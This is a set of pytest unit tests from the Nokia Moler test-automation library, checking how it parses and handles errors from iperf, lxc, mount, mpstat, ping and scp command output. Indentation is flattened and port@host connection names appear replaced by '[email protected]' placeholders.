iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [second_record]
assert iperf_cmd._all_multiport_records_of_interval(connection_name=parallel_client_3) is True
def test_iperf_server_can_calculate_multiport_summary_record_of_interval(buffer_connection):
from moler.cmd.unix import iperf2
from moler.exceptions import ParsingDone
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
client_connection_lines = [
"[ 1] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51914",
"[ 2] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51915",
"[ 3] local 192.168.44.130 port 5016 connected with 192.168.44.1 port 51916",
]
for line in client_connection_lines:
try:
iperf_cmd._parse_connection_name_and_id(line)
except ParsingDone:
pass
parallel_client_1 = ('[email protected]', '[email protected]')
parallel_client_2 = ('[email protected]', '[email protected]')
parallel_client_3 = ('[email protected]', '[email protected]')
first_record = {'Lost_Datagrams_ratio': '0%',
'Jitter': '1.2 ms',
'Transfer': 123904,
'Interval': (0.0, 1.0),
'Transfer Raw': '121 KBytes',
'Bandwidth': 123500,
'Lost_vs_Total_Datagrams': (0, 84),
'Bandwidth Raw': '988 Kbits/sec'}
second_record = dict(first_record)
second_record['Jitter'] = '0.98 ms'
third_record = dict(first_record)
third_record['Jitter'] = '1.48 ms'
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_1] = [first_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_2] = [second_record]
iperf_cmd.current_ret['CONNECTIONS'][parallel_client_3] = [third_record]
iperf_cmd._calculate_multiport_summary_record_of_interval(parallel_client_3)
summary_connection = ('[email protected]', '[email protected]')
assert summary_connection in iperf_cmd.current_ret['CONNECTIONS']
assert iperf_cmd.current_ret['CONNECTIONS'][summary_connection] == [{
'Interval': (0.0, 1.0),
'Transfer': 371712,
'Transfer Raw': '363.0 KBytes',
'Bandwidth': 370500,
'Bandwidth Raw': '2964.0 Kbits/sec',
'Jitter': '1.48 ms',
'Lost_vs_Total_Datagrams': (0, 252),
'Lost_Datagrams_ratio': '0.00%',
}]
def test_iperf_correctly_parses_multiconnection_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_server
def test_iperf_correctly_parses_multiconnection_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_client)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_client
def test_iperf_correctly_breaks_server_on_final_inactivity(buffer_connection):
from moler.cmd.unix import iperf2
cmd_output = iperf2.COMMAND_OUTPUT_multiple_connections_udp_server.split("\n")
prompt = cmd_output.pop()
cmd_output_without_prompt = "\n".join(cmd_output) + "\n"
buffer_connection.remote_inject_response([cmd_output_without_prompt])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
def injecting_break_cmd(self):
self.connection.send("\x03") # ctrl+c
buffer_connection.remote_inject_line(line="^C", add_newline=False)
buffer_connection.remote_inject_line(line=prompt, add_newline=False)
iperf_cmd.break_on_timeout = False # ensuring that break_cmd() is not called via on_timeout()
with mock.patch.object(iperf_cmd.__class__, "break_cmd", injecting_break_cmd):
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_multiple_connections_udp_server
def test_iperf_correctly_parses_singlerun_tcp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_singlerun_server
def test_iperf_correctly_parses_singlerun_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_udp_server)
ret = iperf_cmd()
assert ret == iperf2.COMMAND_RESULT_singlerun_udp_server
def test_iperf_singlerun_server_doesnt_use_ctrlc_to_stop_server(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_singlerun_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_singlerun_server)
with mock.patch.object(iperf_cmd, "break_cmd") as send_ctrlc:
iperf_cmd()
send_ctrlc.assert_not_called()
def test_iperf_detecting_dualtest_at_client(buffer_connection):
from moler.cmd.unix import iperf2
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_client)
assert iperf_cmd.works_in_dualtest is True
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_basic_client)
assert iperf_cmd.works_in_dualtest is False
def test_iperf_detecting_dualtest_at_server(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_bidirectional_udp_server)
iperf_cmd()
assert iperf_cmd.works_in_dualtest is True
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
iperf_cmd()
assert iperf_cmd.works_in_dualtest is False
def test_iperf_sends_additional_ctrl_c_after_detecting_to_early_ctrl_c(buffer_connection):
from moler.cmd.unix import iperf2
normal_iperf_output = iperf2.COMMAND_OUTPUT_multiple_connections_server.splitlines(True)
last_line_with_prompt = normal_iperf_output[-1]
normal_iperf_output[-1] = "^CWaiting for server threads to complete. Interrupt again to force quit\n"
normal_iperf_output.append(last_line_with_prompt)
output_with_too_early_ctrl_c = "".join(normal_iperf_output)
buffer_connection.remote_inject_response([output_with_too_early_ctrl_c])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_server)
with mock.patch.object(iperf_cmd, "_stop_server"):
with mock.patch.object(iperf_cmd, "break_cmd") as break_cmd_method:
iperf_cmd()
break_cmd_method.assert_called_once_with()
iperf_server_output_start = """
xyz@debian:~$ iperf -s -u -i 1
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 8.00 KByte (default)
------------------------------------------------------------
[904] local 10.1.1.1 port 5001 connected with 10.6.2.5 port 32781
"""
def test_iperf_publishes_records_to_subscribed_observers(buffer_connection):
from moler.cmd.unix import iperf2
conn = buffer_connection
conn.remote_inject_response([iperf_server_output_start])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
options='-s -u -i 1')
iperf_stats = []
def iperf_observer(from_client, to_server, data_record=None, report=None):
iperf_record = {}
iperf_record['from_client'] = from_client
iperf_record['to_server'] = to_server
if data_record:
iperf_record['data_record'] = data_record
if report:
iperf_record['report'] = report
iperf_stats.append(iperf_record)
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd.start()
assert len(iperf_stats) == 0
conn.remote_inject_line("[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams")
assert len(iperf_stats) == 0
conn.remote_inject_line("[904] 0.0- 1.0 sec 1.17 MBytes 9.84 Mbits/sec 1.830 ms 0/ 837 (0%)")
assert len(iperf_stats) == 1
assert iperf_stats[0]['from_client'] == '[email protected]'
assert iperf_stats[0]['to_server'] == '[email protected]'
# iperf progress lines produce data_records
assert iperf_stats[0]['data_record'] == {'Interval': (0.0, 1.0),
'Transfer': 1226833,
'Transfer Raw': u'1.17 MBytes',
'Bandwidth': 1230000,
'Bandwidth Raw': u'9.84 Mbits/sec',
'Jitter': u'1.830 ms',
'Lost_vs_Total_Datagrams': (0, 837),
'Lost_Datagrams_ratio': u'0%'}
conn.remote_inject_line("[904] 1.0- 2.0 sec 1.18 MBytes 9.94 Mbits/sec 1.846 ms 5/ 850 (0.59%)")
assert len(iperf_stats) == 2
assert ('data_record' in iperf_stats[-1]) and ('report' not in iperf_stats[-1])
conn.remote_inject_line("[904] 9.0-10.0 sec 1.19 MBytes 10.0 Mbits/sec 1.801 ms 0/ 851 (0%)")
assert len(iperf_stats) == 3
assert ('data_record' in iperf_stats[-1]) and ('report' not in iperf_stats[-1])
# last line of iperf progress produces report
conn.remote_inject_line("[904] 0.0-10.0 sec 11.8 MBytes 9.86 Mbits/sec 2.618 ms 9/ 8409 (0.11%)")
assert len(iperf_stats) == 4
assert 'data_record' not in iperf_stats[-1]
assert iperf_stats[-1]['from_client'] == '10.6.2.5'
assert iperf_stats[-1]['to_server'] == '[email protected]'
assert iperf_stats[-1]['report'] == {'Interval': (0.0, 10.0),
'Transfer': 12373196,
'Transfer Raw': u'11.8 MBytes',
'Bandwidth': 1232500,
'Bandwidth Raw': u'9.86 Mbits/sec',
'Jitter': u'2.618 ms',
'Lost_vs_Total_Datagrams': (9, 8409),
'Lost_Datagrams_ratio': u'0.11%'}
iperf_cmd.cancel()
def test_iperf_publishes_only_summary_records_when_handling_parallel_clients(buffer_connection):
from moler.cmd.unix import iperf2
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_server])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_server)
expected_result = iperf2.COMMAND_RESULT_multiple_connections_udp_server
iperf_stats = {}
iperf_report = {}
def iperf_observer(from_client, to_server, data_record=None, report=None):
conn_name = (from_client, to_server)
if data_record:
if conn_name not in iperf_stats:
iperf_stats[conn_name] = []
iperf_stats[conn_name].append(data_record)
if report:
iperf_report[conn_name] = report
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd()
    # published stats should match the summary records stored in the command result
summary_conn_name = ('[email protected]', '[email protected]')
client_conn_name = ('192.168.44.1', '[email protected]')
assert client_conn_name in iperf_report
assert summary_conn_name in iperf_stats
assert len(iperf_stats.keys()) == 1
assert iperf_stats[summary_conn_name] == expected_result['CONNECTIONS'][summary_conn_name][:-1]
buffer_connection.remote_inject_response([iperf2.COMMAND_OUTPUT_multiple_connections_udp_client])
iperf_cmd = iperf2.Iperf2(connection=buffer_connection.moler_connection,
**iperf2.COMMAND_KWARGS_multiple_connections_udp_client)
expected_result = iperf2.COMMAND_RESULT_multiple_connections_udp_client
iperf_stats = {}
iperf_report = {}
iperf_cmd.subscribe(subscriber=iperf_observer)
iperf_cmd()
    # published stats should match the summary records stored in the command result
summary_conn_name = ('[email protected]', '[email protected]')
client_conn_name = ('192.168.33.5', '[email protected]')
assert client_conn_name in iperf_report
assert summary_conn_name in iperf_stats
assert len(iperf_stats.keys()) == 1
assert iperf_stats[summary_conn_name] == expected_result['CONNECTIONS'][summary_conn_name][:-1]
@pytest.fixture
def command_output_and_expected_result_on_bind_failed():
output = """xyz@debian>iperf -s
bind failed: Address already in use
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_connect_failed():
output = """xyz@debian>iperf -c 10.156.236.132
connect failed: Connection refused
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_iperf_problem():
output = """xyz@debian>iperf -i
iperf: option requires an argument -- i
xyz@debian>"""
result = dict()
return output, result
```
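Many assertions above key the expected `CONNECTIONS` dictionaries by `(local, remote)` tuples in a `port@host` notation, built from iperf header lines of the form `[ n] local <ip> port <p> connected with <ip> port <p>`. Below is a hedged sketch of that naming convention (an illustration, not the command's actual `_parse_connection_name_and_id()` implementation):

```python
import re

_re_conn = re.compile(r'local\s+(?P<l_host>\S+)\s+port\s+(?P<l_port>\d+)\s+'
                      r'connected with\s+(?P<r_host>\S+)\s+port\s+(?P<r_port>\d+)')


def connection_name(line):
    """Build ('local_port@local_host', 'remote_port@remote_host') from an iperf header line."""
    match = _re_conn.search(line)
    if not match:
        return None
    local = "{}@{}".format(match.group("l_port"), match.group("l_host"))
    remote = "{}@{}".format(match.group("r_port"), match.group("r_host"))
    return local, remote


header = "[  3] local 192.168.0.1 port 49597 connected with 1.2.3.4 port 5001"
print(connection_name(header))  # -> ('49597@192.168.0.1', '5001@1.2.3.4')
```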
#### File: cmd/unix/test_cmd_iperf.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.cmd.unix.iperf import Iperf
from moler.exceptions import CommandFailure
def test_iperf_returns_proper_command_string(buffer_connection):
iperf_cmd = Iperf(buffer_connection, options='-c 10.1.1.1 -M 1300 -m')
assert "iperf -c 10.1.1.1 -M 1300 -m" == iperf_cmd.command_string
def test_iperf_raise_error_on_bind_failed(buffer_connection, command_output_and_expected_result_on_bind_failed):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-s')
command_output, expected_result = command_output_and_expected_result_on_bind_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -s' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_no_such_file(buffer_connection, command_output_and_expected_result_on_connect_failed):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-c 10.156.236.132')
command_output, expected_result = command_output_and_expected_result_on_connect_failed
buffer_connection.remote_inject_response([command_output])
assert 'iperf -c 10.156.236.132' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_raise_error_on_iperf_problem(buffer_connection, command_output_and_expected_result_on_iperf_problem):
iperf_cmd = Iperf(connection=buffer_connection.moler_connection, options='-i')
command_output, expected_result = command_output_and_expected_result_on_iperf_problem
buffer_connection.remote_inject_response([command_output])
assert 'iperf -i' == iperf_cmd.command_string
with pytest.raises(CommandFailure):
iperf_cmd()
def test_iperf_correctly_parses_bidirectional_udp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_bidirectional_udp_client])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_bidirectional_udp_client)
res = iperf_cmd()
assert res == iperf.COMMAND_RESULT_bidirectional_udp_client
def test_iperf_correctly_parses_bidirectional_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_bidirectional_udp_server])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_bidirectional_udp_server)
res = iperf_cmd()
assert res == iperf.COMMAND_RESULT_bidirectional_udp_server
def test_iperf_correctly_parses_basic_udp_server_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_basic_server])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_basic_server)
assert iperf_cmd() == iperf.COMMAND_RESULT_basic_server
def test_iperf_correctly_parses_basic_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_basic_client])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_basic_client)
assert iperf_cmd() == iperf.COMMAND_RESULT_basic_client
def test_iperf_correctly_parses_multiconnection_tcp_client_output(buffer_connection):
from moler.cmd.unix import iperf
buffer_connection.remote_inject_response([iperf.COMMAND_OUTPUT_multiple_connections])
iperf_cmd = iperf.Iperf(connection=buffer_connection.moler_connection,
**iperf.COMMAND_KWARGS_multiple_connections)
assert iperf_cmd() == iperf.COMMAND_RESULT_multiple_connections
@pytest.fixture
def command_output_and_expected_result_on_bind_failed():
output = """xyz@debian>iperf -s
bind failed: Address already in use
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_connect_failed():
output = """xyz@debian>iperf -c 10.156.236.132
connect failed: Connection refused
xyz@debian>"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_on_iperf_problem():
output = """xyz@debian>iperf -i
iperf: option requires an argument -- i
xyz@debian>"""
result = dict()
return output, result
```
#### File: cmd/unix/test_cmd_lxc_attach.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.lxc_attach import LxcAttach
from moler.exceptions import CommandFailure
import pytest
def test_lxc_attach_raise_command_error(buffer_connection, command_output_and_expected_result):
data, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response(data)
cmd = LxcAttach(connection=buffer_connection.moler_connection, name="0x4013")
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture()
def command_output_and_expected_result():
data = """
lxc-attach --name=0x4013
lxc-attach: 0x4013: attach.c: lxc_attach: 843 Failed to get init pid.
root@server:~ >"""
result = {}
return data, result
```
#### File: cmd/unix/test_cmd_lxcls.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.lxc_ls import LxcLs
from moler.exceptions import CommandFailure
import pytest
def test_lxcls_raise_command_error(buffer_connection, command_output_and_expected_result):
data, expected_result = command_output_and_expected_result
buffer_connection.remote_inject_response(data)
cmd = LxcLs(connection=buffer_connection.moler_connection, options="--nesting=3")
with pytest.raises(CommandFailure):
cmd()
@pytest.fixture()
def command_output_and_expected_result():
data = """lxc-ls --nesting=3
lxc-ls: attach.c: lxc_proc_get_context_info: 205 No such file or directory - Could not open /proc/26769/status.
lxc-ls: attach.c: lxc_attach: 849 Failed to get context of init process: 21769
0xe000 0xe000/0xe000
root@server:~ >"""
result = {}
return data, result
```
#### File: cmd/unix/test_cmd_mount.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.cmd.unix.mount import Mount
from moler.exceptions import CommandFailure
def test_mount_returns_proper_command_string(buffer_connection):
mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t ext3', device='/tmp/disk.img',
directory='/mnt')
assert "mount -t ext3 /tmp/disk.img /mnt" == mount_cmd.command_string
def test_mount_raise_exception_only_root(buffer_connection, command_output_and_expected_result_only_root_error):
command_output, expected_result = command_output_and_expected_result_only_root_error
buffer_connection.remote_inject_response([command_output])
mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t ext3', device='/tmp/disk.img',
directory='/mnt')
with pytest.raises(CommandFailure):
mount_cmd()
def test_mount_raise_exception_write_protected(buffer_connection, command_output_and_expected_result_write_protected_error):
command_output, expected_result = command_output_and_expected_result_write_protected_error
buffer_connection.remote_inject_response([command_output])
mount_cmd = Mount(connection=buffer_connection.moler_connection, options='-t iso9660', device='virtio-win.iso',
directory='/mnt')
with pytest.raises(CommandFailure):
mount_cmd()
@pytest.fixture
def command_output_and_expected_result_only_root_error():
data = """xyz@debian:~$ mount -t ext3 /tmp/disk.img /mnt
mount: only root can use "--types" option
xyz@debian:~$"""
result = dict()
return data, result
@pytest.fixture
def command_output_and_expected_result_write_protected_error():
data = """root@debian:~$ mount -t iso9660 virtio-win.iso /mnt
mount: /dev/loop0 is write-protected, mounting read-only
root@debian:~$"""
result = dict()
return data, result
```
#### File: cmd/unix/test_cmd_mpstat.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.mpstat import Mpstat
def test_mpstat_returns_proper_command_string(buffer_connection):
mpstat_cmd = Mpstat(connection=buffer_connection.moler_connection, options="-P 0")
assert "mpstat -P 0" == mpstat_cmd.command_string
def test_mpstat_wrong_value(buffer_connection):
wrong_output = """
user@dev:~# mpstat
Linux 4.4.112-rt127 (type) 05/10/18 _armv7l_ (4 CPU)
11:07:06 CPU %usr %nice %sys %iowait %irq %soft %steal %guest %idle
11:07:06 all WO 0.07 2.28 0.50 0.00 0.17 0.00 0.00 95.49
user@dev:~# """
buffer_connection.remote_inject_response([wrong_output])
cmd = Mpstat(connection=buffer_connection.moler_connection)
ret = cmd()
expected_ret = {'cpu': {}}
assert ret == expected_ret
```
#### File: cmd/unix/test_cmd_ping.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.ping import Ping
def test_ping_returns_proper_command_string(buffer_connection):
ping_cmd = Ping(buffer_connection, destination="localhost", options="-c 5")
assert "ping localhost -c 5" == ping_cmd.command_string
def test_ping_observer_timeout(buffer_connection):
from moler.exceptions import CommandTimeout
cmd_ping = Ping(buffer_connection.moler_connection, destination='localhost')
cmd_ping.terminating_timeout = 0
with pytest.raises(CommandTimeout):
cmd_ping(timeout=0.1)
```
#### File: cmd/unix/test_cmd_scp.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.scp import Scp
from moler.exceptions import CommandFailure
import re
import pytest
def test_scp_returns_proper_command_string(buffer_connection):
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="/home/ute/test",
dest="ute@localhost:/home/ute")
assert "scp /home/ute/test ute@localhost:/home/ute" == scp_cmd.command_string
def test_scp_works_properly_on_slice_string(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = slice_index
scp_cmd._max_index_from_end = slice_index
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existing string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m.group(0) == beginning_command_string[:slice_index]
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m.group(0) == finish_command_string[-slice_index:]
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_works_properly_on_slice_string_beginning(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = slice_index
scp_cmd._max_index_from_end = 0
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existing string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m.group(0) == beginning_command_string[:slice_index]
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m is None
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_works_properly_on_slice_string_end(buffer_connection):
slice_index = 17
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="[email protected]:/tmp/WHERE/archive_with_long_name.zip",
dest="/home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots",
options="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22")
scp_cmd._max_index_from_beginning = 0
scp_cmd._max_index_from_end = slice_index
command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/WHERE/archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
beginning_command_string = r"scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -r -P 22 [email protected]:/tmp/"
finish_command_string = r"archive_with_long_name.zip /home/user/logs/VeryLongPathWithVeryDetailedInformation/Full_Auto_Pipeline_snapshots"
not_existing = r"No existing string in the command string"
assert command_string == scp_cmd.command_string
m = re.search(scp_cmd._cmd_escaped, beginning_command_string)
assert m is None
m = re.search(scp_cmd._cmd_escaped, finish_command_string)
assert m.group(0) == finish_command_string[-slice_index:]
m = re.search(scp_cmd._cmd_escaped, not_existing)
assert m is None
def test_scp_raise_exception_failure(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
ute@localhost's password:
test: not a regular file
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_no_key_file(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?".
Host key verification failed.
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_no_known_hosts_on_failure(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
Are you sure you want to continue connecting (yes/no)?"
Please contact your system administrator.
Add correct host key in /home/sward/.ssh/known_hosts to get rid of this message.
Offending RSA key in /home/sward/.ssh/known_hosts:86
RSA host key for [...] has changed and you have requested strict checking.
Host key verification failed.
ute@debdev:~/Desktop$ """
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_key_verification_permission_denied(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
Permission denied, please try again.
ute@localhost's password:
Permission denied, please try again.
ute@localhost's ldap password:
Permission denied (publickey,password).
lost connection
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_failure_not_a_directory(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test ute@localhost:/home/ute
Not a directory
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test", dest="ute@localhost:/home/ute",
known_hosts_on_failure="")
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_ldap_password(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ute@localhost's ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="", password="<PASSWORD>", repeat_password=False)
with pytest.raises(CommandFailure):
scp_cmd()
def test_scp_raise_exception_ldap_password_coppied(buffer_connection):
command_output = """
ute@debdev:~/Desktop$ scp test.txt ute@localhost:/home/ute
ute@localhost's password:
ute@localhost's ldap password:
test.txt 100% 104 0.1KB/s 00:00
ute@debdev:~/Desktop$"""
passwords = ("<PASSWORD>", "<PASSWORD>")
buffer_connection.remote_inject_response([command_output])
scp_cmd = Scp(connection=buffer_connection.moler_connection, source="test.txt", dest="ute@localhost:/home/ute",
known_hosts_on_failure="", password=passwords)
scp_cmd()
assert len(passwords) == 2
assert passwords[0] == "<PASSWORD>"
assert passwords[1] == "<PASSWORD>"
```
#### File: cmd/unix/test_cmd_su.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.su import Su
from moler.exceptions import CommandFailure
def test_su_returns_proper_command_string(buffer_connection):
